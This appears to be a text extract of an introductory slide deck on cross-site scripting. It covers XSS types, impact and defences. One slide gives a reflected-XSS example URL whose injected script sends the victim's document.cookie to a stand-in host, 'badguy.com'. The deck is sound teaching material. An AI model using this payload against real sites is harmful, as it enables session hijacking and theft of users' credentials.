Xss (cross site scripting)

1. ••••••••••••••••••••••••••••••••••
••••••••••••••••••••••••••••••••••

2. What is XSS (Cross Site Scripting) ?
Types of XSS (Cross Site Scripting)
What is the impact of Cross Site Scripting ?
How can we protect applications against XSS ?

3. ••••••••••••••••••••••••••••••••••
Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in Web applications. XSS enables
attackers to inject client-side script into Web pages.
 Embedded in HTML page
 Supports different languages (JavaScript, VBScript, ActiveX, etc.)
 Most prominent: JavaScript
 Attacker „makes“ Web-Server deliver malicious script code
 Malicious script is executed in Client’s Web Browser
Scripting : Web Browsers can execute commands
Cross-Site : Foreign script sent via server to client
Caused by insufficient input validation.

4. ••••••••••••••••••••••••••••••••••
 Reflected XSS (Non-Persistent)
Three types of XSS :
– Link in other website or email
 Stored XSS (Persistent)
– Forum, bulletin board, feedback form
 Local XSS
– PDF Adobe Reader, Flash player

5. ••••••••••••••••••••••••••••••••••
Send e-mail with </script> tags
embedded in link
Follow the link and script executes
http://mybank.com/account.php?variable=„>
<script>document.location=‚http://badguy.com/cgi-
bin/cookie.cgi‘“%20+document.cookie</script>
Attacker
www.badguy.com
Coockie Collector
!!! attack code !!!
Reflected XSS (Non-Persistent) :
Victim
 Malicious content does not get
stored in the sever
 The server bounces the original input
to the victim without modification

6. ••••••••••••••••••••••••••••••••••
Post Forum Message:
Subject: GET Money for FREE !!!
Body:
<script> attack code </script>
1. Attacker sends malicious code
2. Server stores message
Did you know this?
.....
3. User requests message
4. Message is delivered by server
5. Browser executes script in message
GET Money for FREE !!!
<script> attack code </script>
Get /forum.jsp?fid=122&mid=2241
Attacker
Client
Web Server
GET Money for FREE !!!
<script> attack code </script>
!!! attack code !!!
Re: Error message on startup
.....
I found a solution!
.....
Can anybody help?
.....
Error message on startup
.....
Stored XSS (Persistent) :

7. ••••••••••••••••••••••••••••••••••
Local XSS :
 The injected script does not traverse to the server

8. ••••••••••••••••••••••••••••••••••
 Normal Users :
Access to authentication credentials forWeb application
– Access to personal data (Credit card, Bank Account)
– Access to business data (Bid details, construction details)
– Misuse account (order expensive goods)
 High Privileged Users :
– Control over Web application
– Control / Access : Web server machine
– Control / Access : Backend / Database systems

9. ••••••••••••••••••••••••••••••••••
 Denial-of-Service :
– Crash user’s bowser, Pop-up flodding, Redirection
 Access to user’s machine :
– Upload local data to attacker’s machine

10. ••••••••••••••••••••••••••••••••••
 Client Side :
– Disable JS
– Verify e-mail
– Always update
 Server Side :
– Input validation
– Encode all meta characters send to the client
– Keep track of user sessions
– Web application firewall
– Always test

11. ••••••••••••••••••••••••••••••••••